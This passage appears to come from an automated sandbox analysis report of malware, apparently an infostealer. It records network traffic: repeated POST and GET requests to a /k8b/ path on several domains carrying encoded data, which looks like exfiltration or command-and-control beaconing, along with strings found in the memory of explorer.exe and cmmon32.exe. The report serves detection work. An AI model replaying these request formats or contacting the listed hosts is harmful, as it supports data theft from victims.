78 30 4d 66 49 6f 45 72 76 7a 51 7a 30 54 4a 32 63 54 61 74 63 65 70 35 54 59 4f 42 34 6c 33 49 64 37 4a 35 36 49 79 55 41 47 6b 50 69 6a 7a 62 43 7e 73 49 78 37 58 52 5a 66 7a 69 46 66 73 4e 51 4c 59 69 46 43 41 72 64 6c 30 6e 45 6a 78 76 66 66 73 65 2d 38 50 67 51 4f 46 72 6a 41 53 57 4f 69 58 7a 73 69 68 31 6c 50 64 50 66 28 5a 61 2d 57 6f 69 33 71 65 4d 54 4d 42 65 6b 6e 53 67 76 59 74 38 43 44 33 62 49 6d 46 30 7a 67 6d 78 54 65 34 4b 44 6b 54 35 78 41 4d 64 43 6d 79 37 43 32 4f 67 78 42 38 64 34 76 51 30 55 65 39 6a 4d 39 31 56 45 64 64 4a 41 32 39 48 4f 4b 36 4f 31 44 44 4b 57 58 42 37 73 44 30 71 38 45 61 4e 32 39 56 7e 65 55 32 37 42 46 77 49 43 57 47 31 4e 4e 44 6d 66 36 56 69 75 4e 50 43 5f 4b 48 45 6a 4b 35 54 42 4d 69 62 45 75 39 57 66 55 68 39 6a 43 50 6c 6c 4b 57 66 53 51 6d 67 5a 4a 47 70 68 66 32 42 70 53 77 6d 4b 44 38 6f 64 66 73 30 34 41 41 70 46 73 79 77 75 6b 73 55 64 6b 50 66 69 43 73 70 68 57 51 45 44 7e 59 32 32 31 67 61 52 78 66 32 67 39 36 35 78 67 72 4b 43 6d 66 6a 34 6d 44 73 45 61 6c 57 73 57 5f 51 37 37 54 71 63 42 5a 69 45 68 73 51 68 4e 63 6a 58 48 37 76 68 6b 52 32 70 6a 4f 74 31 78 37 31 65 4c 58 44 6e 52 63 48 51 4b 75 28 55 38 55 34 32 62 43 69 59 48 4d 38 44 39 53 78 4e 44 52 79 67 78 5f 50 43 51 6b 43 35 51 36 68 76 55 56 46 4e 37 7a 63 47 49 62 76 2d 68 56 4e 48 45 71 6f 57 71 69 32 58 57 6a 33 6e 46 33 73 6e 28 35 6f 5f 66 35 4f 64 4f 53 58 56 30 39 58 5a 50 46 70 5a 61 30 55 70 73 66 34 61 68 2d 4a 50 52 45 34 4d 44 63 6e 51 46 30 77 71 28 38 7e 76 62 76 4a 79 54 57 6b 76 7e 64 59 7a 7a 34 34 73 59 4a 45 53 32 31 35 55 4d 59 73 36 77 6f 30 58 67 71 69 75 47 5f 6f 61 31 67 72 6d 67 67 57 47 58 43 4c 62 72 71 38 54 57 68 7e 53 61 50 51 66 6f 49 39 56 70 55 55 72 4f 77 52 6d 45 6d 42 62 52 58 33 6f 68 33 77 5f 6d 39 67 53 73 36 37 7a 70 33 45 31 55 49 68 54 55 70 78 39 55 72 62 70 59 6d 35 46 76 33 73 41 6a 70 4f 6a 4f 5f 54 56 4e 4b 68 64 6d 55 35 49 76 75 42 44 34 6a 67 45 55 32 44 51 75 32 7e 79 37 58 35 62 62 68 5a 4d 6f 39 68 76 43 66 55 32 70 71 62 55 30 6f 76 58 47 50 7
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.synertry.netConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.synertry.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.synertry.net/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 61 75 6f 71 72 36 6b 53 4b 78 4f 6f 68 77 77 4c 6a 67 56 77 73 4d 4a 39 78 77 79 47 38 31 6e 39 49 75 77 72 4f 6a 69 37 34 45 6b 69 79 67 4e 36 71 6e 55 49 6a 44 56 6f 38 73 5a 2d 63 6a 6b 6a 75 50 78 47 47 7a 48 63 41 32 70 4d 59 77 35 62 52 37 6c 4b 45 59 31 5f 46 5f 62 35 55 37 77 33 52 33 65 79 7e 71 6e 51 45 63 6e 33 57 4f 37 77 64 4a 37 4d 6a 45 52 7a 37 4e 78 2d 73 68 6c 4c 43 37 71 78 47 43 74 77 56 7a 5a 76 54 6d 59 67 67 6a 28 30 38 44 35 31 57 39 4e 45 38 2d 31 43 67 35 6a 67 69 35 39 4c 67 69 61 6a 61 68 56 48 6b 35 67 70 53 51 68 64 6a 49 6e 59 6d 46 61 57 57 4f 4f 49 75 2d 5a 7a 55 34 28 38 4a 66 45 6c 28 4e 66 68 74 55 66 6b 77 51 6d 64 46 2d 74 73 6a 4c 4b 77 71 4b 42 36 76 4d 45 56 4c 36 35 37 41 69 28 67 61 6a 70 49 6f 68 47 48 77 52 34 71 6a 34 51 39 53 6c 68 79 69 72 72 41 35 69 77 70 35 61 72 6a 6f 46 4c 56 5a 6b 4a 76 5a 51 55 41 6c 73 73 59 4e 30 33 36 63 47 7a 69 53 5a 7e 6e 64 4f 63 2d 51 37 68 57 5a 61 63 6f 49 6a 53 54 47 45 54 51 4f 42 47 51 65 49 6d 41 5a 6e 58 2d 4d 39 37 63 33 4a 56 43 35 6c 76 2d 77 52 41 46 73 33 76 44 31 75 55 48 6a 34 4b 49 6a 66 6a 52 61 62 79 54 4f 66 6b 43 65 56 64 30 72 70 4b 79 64 72 58 4f 48 42 4d 38 31 5f 6f 62 4c 46 35 59 58 32 68 78 76 4d 59 72 37 69 41 4c 4a 6d 4f 33 6b 48 74 74 6c 6e 6a 35 4d 38 5a 6e 73 65 4d 67 4e 34 63 73 74 56 54 45 70 32 30 41 71 69 6f 31 78 71 30 78 34 33 77 79 57 77 71 30 62 78 32 57 42 7a 7a 44 41 75 72 71 44 67 36 56 68 73 6d 51 79 59 6d 36 63 77 6e 71 66 54 6c 75 62 66 53 37 62 68 51 6a 41 51 74 68 51 44 69 57 74 4e 67 78 4d 68 75 6d 38 48 71 4e 64 70 4d 44 6d 35 41 46 50 6a 35 32 42 39 30 4a 79 53 41 68 5a 68 7a 42 48 77 76 38 62 64 33 77 63 5f 42 47 6f 72 56 72 4e 77 77 6d 6a 6a 79 58 39 2d 4f 66 45 72 49 58 33 72 28 72 4d 76 69 53 75 57 4f 49 41 34 69 6c 63 5f 55 35 77 4d 49 43 50 70 36 30 59 42 79 72 41 65 76 4c 6f 4e 58 56 37 55 55 68 5a 38 47 68 66 55 4b 52 56 46 71 72 56 65 4a 30 4b 6e 42 78 59 59 6e 47 48 67 6f 33 63 41 76 55 74 4a 77 58 6b 4d 78 6a 49 59 57 38 73 36 75 48 45 30 41 6e 44 59 45 77 55 44 63 4e 56 48 78 32 4c 5f 79 52 4a 37 67 32 56 43 32 55 63 32 79 32 4a 49 57 59 51 51 29 2e 00 29 2e 00 6e 41 33 36 Data Ascii: 2d=auoqr6kSKxOohwwLjgVwsMJ9xwyG81n9IuwrOji74EkiygN6qnUIjDVo8sZ-cjkjuPxGGzHcA2pMYw5bR7lKEY1_F_b5U7w3R3ey~qnQEcn3WO7wdJ7MjERz7Nx-shlLC7qxGCtwVzZvTmYggj(08D51W9NE8-1Cg5jgi59LgiajahVHk5gpSQhdjInYmFaWWOOIu-ZzU4(8JfEl(NfhtUfkwQmdF-tsjLKwqKB6vMEVL657Ai(gajpIohGHwR4qj4Q9SlhyirrA5iwp5arjoFLVZkJvZQUAlssYN036cGziSZ~ndOc-Q7hWZacoIjSTGETQOBGQeImAZnX-M97c3JVC5lv-wRAFs3vD1uUHj4KIjfjRabyTOfkCeVd0rpKydrXOHBM81_obLF5YX2hxvMYr7iALJmO3kHttlnj5M8Zn
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.synertry.netConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.synertry.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.synertry.net/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 61 75 6f 71 72 37 74 72 4e 42 37 77 77 31 59 4b 68 77 46 43 6f 49 4e 76 67 67 66 62 72 7a 4f 4f 55 4e 46 67 4f 6a 79 5f 30 68 42 5f 31 41 64 36 69 46 4d 50 35 7a 56 6e 72 38 5a 78 59 6a 70 4b 75 66 4a 4f 47 79 7a 79 41 32 68 4c 53 54 77 66 53 72 6c 64 47 34 4a 50 56 50 4f 37 55 2d 70 4f 51 56 53 36 37 71 37 51 42 6f 4c 78 4b 66 71 79 59 4d 53 4d 35 55 64 32 32 76 42 6e 73 52 4a 5f 44 65 36 54 4c 54 78 32 58 78 46 77 4e 33 70 33 6b 79 33 72 79 7a 74 32 54 36 64 58 34 5a 64 47 68 34 6a 6f 74 59 39 49 6f 7a 79 71 66 6d 78 50 75 6f 31 54 42 7a 70 76 6a 4c 57 76 6f 54 36 44 63 74 4b 41 6a 76 55 57 66 70 37 69 46 4d 38 48 37 4c 6a 71 76 56 75 32 28 79 75 57 50 50 41 73 69 49 79 65 6b 4f 46 42 38 70 6f 5a 54 59 78 70 42 54 33 6f 53 41 67 71 67 47 37 42 6e 52 59 79 69 36 39 53 4d 31 67 6d 74 4c 72 45 74 30 63 56 7e 59 61 75 6f 57 6a 30 54 48 70 36 52 6b 68 48 32 61 6c 39 41 78 4b 43 61 6b 4c 55 64 4e 43 50 5a 5f 6f 6c 58 6f 52 32 65 61 64 6f 47 42 36 6d 47 45 54 71 4f 44 7e 36 65 35 43 41 59 79 62 58 4e 65 54 75 69 5a 56 6c 28 31 28 38 6d 79 6b 76 73 33 33 44 31 62 70 61 6b 66 57 49 6b 4f 54 57 61 35 61 54 44 50 6b 43 53 31 64 31 76 70 4b 4a 64 70 28 77 57 78 67 38 6c 64 6f 5a 4a 6d 68 53 61 55 39 38 28 4d 59 73 68 57 30 56 43 46 62 51 6b 47 70 70 6b 47 4b 4f 50 4e 52 6b 6f 39 6b 73 4c 4b 30 76 69 48 50 59 70 77 73 59 71 69 6b 4b 77 72 64 6d 7a 31 45 76 45 6d 69 31 61 67 4b 46 52 41 61 62 51 4c 57 77 52 7a 4b 52 38 4d 79 57 78 34 33 6f 63 54 44 49 65 56 78 36 54 5f 32 42 64 51 45 76 48 68 39 79 4d 77 32 36 6e 66 30 70 4c 78 7e 45 37 6c 36 70 4d 72 67 4e 6e 36 6f 6c 5a 51 56 68 47 75 67 30 34 77 55 34 57 41 66 4b 41 43 58 4a 61 4e 33 6b 57 61 4e 6f 6e 70 42 77 59 7a 46 34 71 47 53 4e 7a 73 69 64 46 4a 77 59 31 63 6a 53 48 5f 37 53 76 54 6d 48 45 36 33 58 66 75 42 59 69 75 77 32 50 4a 33 41 55 51 48 53 4a 66 62 72 6c 4f 36 72 74 6e 6b 41 43 61 43 35 4c 6d 28 33 64 33 79 33 55 38 39 4f 65 32 4a 5a 65 35 66 79 61 79 30 39 62 6e 50 68 33 34 49 6c 6d 74 56 58 48 50 6a 4d 34 61 44 75 48 31 30 6f 47 35 31 71 54 69 56 4e 52 44 73 54 4d 66 28 4a 4d 63 6b 39 66 53 61 4d 65 7a 57 6c 46 49 37 4b 4e 5a 55 6c 47 31 77 72 78 6e 74 53 6c 55 75 45 70 34 77 65 28 34 64 72 49 43 63 74 34 4a 37 70 65 74 36 33 70 74 67 35 43 75 39 6f 53 4a 6b 6d 32 6a 6e 41 44 42 33 6d 42 48 66 49 30 46 67 31 61 38 31 31 6a 4d 32 59 31 70 48 4b 6a 45 51 78 51 46 42 49 6a 4f 55 6d 54 4d 30 38 58 75 57 6a 69 69 4e 63 76 6b 30 75 63 7a 7e 65 4b 66 4a 64 6a 71 35 31 70 70 79 73 6b 70 48 73 46 61 59 6a 39 34 65 43 76 35 6d 64 57 5a 64 2d 4f 53 4b 6e 72 6e 41 51 5a 69 35 42 4e 4b 6f 77 36 56 68 3
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.thegamergang.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.thegamergang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thegamergang.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 4f 55 53 41 70 55 43 59 43 63 31 69 5a 37 66 72 6e 44 38 75 7a 32 5a 50 66 6e 4a 31 48 6f 7a 62 33 35 6b 6e 62 5f 69 6b 63 56 6f 5a 49 4c 69 45 64 6e 78 35 36 46 6e 31 34 6f 31 42 43 4a 51 6e 79 59 4d 6d 4b 52 51 4f 49 58 34 49 6f 56 75 65 5a 50 30 2d 44 61 6b 54 33 71 46 51 48 65 56 45 4d 68 74 67 49 68 61 49 6c 41 69 42 38 61 51 44 35 62 57 6a 48 53 30 52 61 30 4d 75 45 6b 52 39 48 4b 5a 69 73 69 6a 36 35 53 65 59 47 31 4b 6e 63 36 45 6a 7a 2d 6c 49 5a 74 6f 39 37 52 62 56 48 44 50 46 33 6b 7e 34 6f 54 51 4f 76 53 6b 56 30 6f 68 51 38 57 77 37 4b 79 48 4e 51 4d 4a 4a 58 76 32 79 32 31 65 56 61 79 35 72 6b 7a 77 7a 4c 35 58 2d 34 4b 45 45 69 55 7e 30 49 33 47 78 63 68 4f 58 62 4e 4a 58 71 46 35 32 5a 30 7e 5f 76 38 53 58 71 5f 4e 62 48 54 32 2d 59 59 44 61 37 65 67 4c 69 68 54 4c 30 64 59 61 7a 76 69 6a 70 4d 49 66 6d 6f 4a 7a 51 69 47 65 39 77 49 65 66 47 42 32 34 7a 39 73 61 38 5a 55 61 4a 48 6a 64 61 74 6c 69 77 44 64 51 67 4f 39 67 68 4f 77 4c 79 6f 4d 5a 33 51 51 7a 44 57 33 61 2d 6e 63 47 4f 56 61 74 73 57 70 77 2d 6b 79 56 68 52 4c 66 74 45 4c 36 38 75 31 77 51 35 58 57 39 48 7a 70 49 41 6b 67 68 58 47 4e 59 34 4b 43 65 30 34 73 43 64 4c 79 69 4b 54 45 6b 52 4e 70 7a 70 63 65 34 55 75 4a 43 4a 6d 75 6c 45 34 42 45 4c 55 77 6a 52 44 63 4b 7a 6f 6e 6d 33 47 43 66 45 76 73 73 38 31 77 49 4a 4b 36 72 7e 66 54 69 7e 50 70 59 75 44 42 54 36 4f 6a 61 4a 4f 36 6a 67 53 4a 5f 53 41 6d 69 4a 71 54 55 50 47 57 4b 7a 61 66 68 78 72 4f 54 38 46 51 6d 32 45 4b 69 73 56 7a 4f 74 71 4e 5f 57 55 39 53 4c 2d 66 38 51 33 31 6b 34 77 46 76 4c 47 76 6f 4f 72 6b 4a 4c 48 37 66 56 4f 54 4b 49 4b 73 56 30 42 59 79 61 4d 71 76 65 57 74 36 4a 35 5a 31 30 46 62 72 66 4d 44 67 69 32 33 48 64 64 4f 63 45 41 32 72 6d 44 7a 61 6b 4e 30 37 6d 6b 4f 4e 46 46 6b 4e 51 6e 51 5f 4f 6b 50 47 28 41 4a 38 46 38 4c 6d 41 4b 79 4d 73 36 51 70 48 67 31 56 43 50 51 30 39 59 72 53 51 79 62 31 6c 49 4d 38 73 68 32 55 37 6c 4c 6d 74 34 57 54 30 70 71 76 33 71 76 5f 77 49 70 5f 49 33 71 74 75 64 71 37 41 49 33 6c 32 42 37 4e 4b 76 66 6f 4c 78 68 79 67 75 4c 6b 58 78 42 4a 58 47 39 76 71 61 28 58 70 5a 71 5a 31 44 6a 77 29 2e 00 79 72 4a 52 61 50 7e Data Ascii: 2d=OUSApUCYCc1iZ7frnD8uz2ZPfnJ1Hozb35knb_ikcVoZILiEdnx56Fn14o1BCJQnyYMmKRQOIX4IoVueZP0-DakT3qFQHeVEMhtgIhaIlAiB8aQD5bWjHS0Ra0MuEkR9HKZisij65SeYG1Knc6Ejz-lIZto97RbVHDPF3k~4oTQOvSkV0ohQ8Ww7KyHNQMJJXv2y21eVay5rkzwzL5X-4KEEiU~0I3GxchOXbNJXqF52Z0~_v8SXq_NbHT2-YYDa7egLihTL0dYazvijpMIfmoJzQiGe9wIefGB24z9sa8ZUaJHjdatliwDdQgO9ghOwLyoMZ3QQzDW3a-ncGOVatsWpw-kyVhRLftEL68u1wQ5XW9HzpIAkghXGNY4KCe04sCdLyiKTEkRNpzpce4UuJCJmulE4BELU
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.thegamergang.comConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.thegamergang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thegamergang.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 4f 55 53 41 70 56 4c 70 4e 4e 6b 2d 64 49 37 51 6e 54 73 6d 33 32 6f 4b 62 6b 38 78 42 37 53 71 30 72 78 73 62 2d 79 6f 55 30 34 4c 5a 59 36 45 4e 55 4a 30 69 56 6e 79 36 6f 31 43 47 4a 74 59 75 62 38 75 4b 51 55 67 49 58 67 4a 68 7a 71 62 5a 66 31 32 43 36 34 5f 78 71 41 4d 48 63 52 39 4e 48 4d 6c 64 52 57 49 36 6b 32 44 7a 62 67 59 77 2d 7e 34 5a 79 6f 75 57 56 6c 79 44 57 55 45 47 70 6b 48 72 6a 28 34 7a 43 6d 54 4a 57 43 50 50 5a 30 38 32 75 42 50 57 50 56 35 28 77 58 5a 45 43 4f 36 7a 56 7e 37 71 6a 6f 36 71 52 4d 6e 77 61 4d 6d 77 6a 34 46 4b 7a 44 33 4c 70 42 69 63 49 75 4d 33 45 43 7a 52 67 56 31 6d 43 77 72 50 5f 69 4d 31 72 31 67 67 51 75 56 66 32 71 6b 64 6a 33 53 66 73 4e 73 6f 78 4a 79 53 6c 4f 74 6f 72 4c 55 6a 65 39 30 64 67 47 50 53 73 28 73 34 64 4d 68 28 52 54 33 79 74 59 47 37 4b 6d 62 75 4e 4d 55 68 38 4e 65 4a 52 32 50 79 30 34 45 61 45 45 5a 32 32 4a 58 5a 4e 70 6d 51 61 76 31 58 4b 67 70 68 6e 79 67 48 51 50 76 71 48 79 5f 4c 79 6f 6d 5a 79 39 39 79 79 43 33 63 73 7e 51 45 74 4e 47 68 38 58 31 32 75 55 73 62 79 45 51 66 74 4d 4c 38 4e 79 4c 77 6e 74 58 46 65 76 77 74 5a 41 6b 6a 52 58 47 41 34 34 4c 47 65 30 4c 73 41 31 6c 31 67 7e 54 4e 33 52 4c 6f 53 6f 54 64 38 64 53 4b 79 4a 52 37 55 45 59 51 56 58 77 77 67 74 48 64 72 62 53 71 31 58 48 47 36 41 6a 71 61 6f 30 79 35 38 54 36 72 6e 59 54 6a 44 56 71 61 66 7a 58 42 4f 4e 69 66 4a 50 79 69 4d 6e 66 49 50 41 74 51 68 37 46 44 37 4b 5a 61 33 63 66 42 68 4b 4e 77 5a 61 54 6c 7e 75 65 54 4a 71 77 5f 70 75 58 37 54 47 79 79 33 53 52 74 38 56 33 45 49 4f 45 4f 75 68 70 65 65 78 6c 4f 6d 69 28 64 5a 5a 58 61 59 7a 68 33 77 55 64 79 6d 78 67 2d 4f 6a 74 71 4a 74 54 54 34 72 48 34 47 55 41 44 6e 75 37 6c 74 78 49 65 6f 65 33 4a 65 4d 36 4b 59 77 70 72 4f 74 65 63 51 46 31 59 52 64 51 72 76 44 49 30 6e 6f 49 59 74 33 61 54 6f 32 6e 5f 4e 52 47 35 66 76 28 6b 61 32 66 6d 38 64 7a 6c 41 42 52 44 78 44 50 59 51 54 75 46 44 33 44 6c 68 32 56 77 70 39 75 49 48 78 73 74 77 71 6d 5f 74 51 31 75 47 2d 39 37 73 42 30 67 7e 43 30 4e 62 33 49 62 4b 72 33 57 38 39 48 6d 43 5f 4d 2d 53 79 36 63 69 4b 79 78 59 35 6e 36 49 56 38 38 43 6c 42 33 6c 4e 7a 4b 46 69 50 36 66 66 30 7a 72 4b 6e 50 73 43 32 76 6e 5f 48 39 76 52 43 69 62 57 53 65 34 55 43 51 7e 74 6e 4a 64 53 7a 74 57 6e 54 75 56 44 72 4c 32 59 5a 57 54 71 4e 71 56 2d 6e 71 78 59 32 5a 46 64 62 41 79 6a 4c 65 4f 70 42 30 31 54 6a 4c 57 36 71 71 37 51 41 70 75 56 75 54 6e 67 48 44 4d 36 76 49 50 63 7e 4a 73 43 45 35 67 66 78 37 69 47 61 47 73 51 79 73 74 59 43 52 78 57 63 4e 6e 5f 6b 51 49 56 59 67 74 65 61 69 72 55 4e 4b 68 3
          Source: global trafficHTTP traffic detected: GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=QU/cSQlyWULsyYPN7f8pVUlciIeVDbN6hq2yW5NFQQssp9aWfv8U6s5pDOfeB2nX0463 HTTP/1.1Host: www.trusted-inspections.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.hblajiche.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.hblajiche.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=SMkQ1dJlHASFxCpf/3Q/18F7mw+X92y3N7IjaU2400Q98kZWvVlmzFAE//BOXQVAl/hL HTTP/1.1Host: www.synertry.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=G2e63y+YEqJJE4Cw6H5CpBVpRFZjJJTpk/5kYvmebWk4ZKuMNVRhpz6yqptgD5pJx6df&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.thegamergang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.trusted-inspections.com
          Source: unknownHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.trusted-inspections.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.trusted-inspections.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trusted-inspections.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 59 32 7a 6d 4d 33 42 57 4b 46 6e 75 6c 62 47 4d 6a 35 70 44 58 41 31 41 68 39 6d 41 4c 37 42 37 28 4e 33 68 4e 36 46 4f 57 41 51 48 70 75 47 31 64 63 42 4f 35 70 31 72 64 5f 54 4d 42 69 54 2d 71 74 69 35 57 63 6c 44 34 72 71 44 45 64 78 57 68 39 53 67 64 65 66 4c 45 66 7e 4b 66 44 49 6e 76 31 68 67 76 6d 70 71 37 4d 61 5a 69 6f 51 7a 4f 69 69 49 41 5a 44 76 57 79 74 34 71 36 4f 78 66 47 6f 4b 65 41 54 6c 70 30 4b 74 69 32 67 71 35 75 6a 6c 31 78 72 74 47 52 74 6d 44 69 69 41 38 6c 33 69 75 79 63 36 57 42 54 39 6b 31 51 71 42 56 74 32 69 52 5a 53 34 31 4a 71 46 64 76 51 52 5a 43 32 64 63 61 33 64 36 63 4f 56 36 68 6d 39 4a 34 66 37 69 4e 72 45 70 33 4f 67 54 48 53 53 59 71 4d 41 4e 28 70 42 46 5a 52 36 42 5a 47 75 4e 70 68 55 35 6f 55 4b 38 4a 2d 59 61 39 7a 79 71 66 51 47 44 53 74 4c 56 49 50 42 43 7e 49 36 2d 55 4b 6e 4b 59 62 52 6f 36 32 4c 34 4e 70 76 5f 33 2d 53 5a 38 6b 51 77 54 55 75 30 4e 38 58 63 7a 2d 48 75 6c 66 55 59 71 65 6a 44 52 72 74 33 63 72 7e 43 28 49 31 4a 59 4f 74 54 76 67 7e 79 72 41 5a 57 6e 4a 4c 55 30 62 75 56 4e 37 42 6a 71 34 63 38 77 35 4b 47 54 41 48 52 6c 77 49 66 78 50 6e 42 45 66 4e 68 63 57 75 4c 66 41 49 43 36 39 35 4b 49 51 33 76 30 6f 45 41 6c 52 38 38 68 30 4f 36 6f 74 51 54 63 61 28 4e 6c 48 6a 6b 58 49 38 44 6e 57 77 5f 36 30 38 7a 4a 4e 33 33 46 34 42 68 78 4f 6a 67 36 50 31 67 46 70 55 31 6f 54 71 54 55 52 37 79 34 6c 71 43 4e 4e 65 43 78 64 77 6a 52 4d 76 6a 4b 56 52 5a 66 75 34 6a 51 70 6e 4b 52 34 4a 62 30 4d 57 76 69 34 67 6d 64 63 42 42 57 39 53 49 5a 75 36 45 4f 54 66 70 53 57 79 71 44 35 51 4a 71 6e 62 72 44 77 49 63 4f 4c 74 65 7a 32 70 4e 4a 61 4b 51 31 76 4e 58 67 35 39 52 54 59 50 42 63 7a 35 75 63 53 33 4f 6f 2d 39 52 78 7a 6e 51 51 64 71 65 32 6f 61 74 42 74 7e 4b 6e 43 69 6a 52 6c 7e 68 4c 73 63 64 79 50 56 2d 69 44 4a 54 78 69 69 44 70 33 4d 71 6d 51 41 74 78 4f 69 45 70 32 6d 58 4c 48 36 73 4c 57 4e 6e 51 38 36 2d 6a 5a 31 33 4b 79 6f 4b 54 6c 31 41 4b 38 66 38 59 59 33 48 59 77 4a 74 47 32 62 49 39 35 6a 4c 4f 77 36 75 34 43 41 68 6b 5f 52 34 64 6e 41 33 36 49 34 51 38 6e 79 72 4a 52 61 50 7e 63 4b 6b 7a 61 66 4c 35 6c 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2d=Y2zmM3BWKFnulbGMj5pDXA1Ah9mAL7B7(N3hN6FOWAQHpuG1dcBO5p1rd_TMBiT-qti5WclD4rqDEdxWh9SgdefLEf~KfDInv1hgvmpq7MaZioQzOiiIAZDvWyt4q6OxfGoKeATlp0Kti2gq5ujl1xrtGRtmDiiA8l3iuyc6WBT9k1QqBVt2iRZS41JqFdvQRZC2dca3d6cOV6hm9J4f7iNrEp3OgTHSSYqMAN(pBFZR6BZGuNphU5oUK8J-Ya9zyqfQGDStLVIPBC~I6-UKnKYbRo62L4Npv_3-SZ8kQwTUu0N8Xcz-HulfUYqejDRrt3cr~C(I1JYOtTvg~yrAZWnJLU0buVN7Bjq4c8w5KGTAHRlwIfxPnBEfNhcWuLfAIC695KIQ3v0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 16 Oct 2020 18:04:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000004.00000002.486709012.0000000004E61000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: cmmon32.exe, 0000000A.00000002.476667464.0000000000D1E000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoK
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
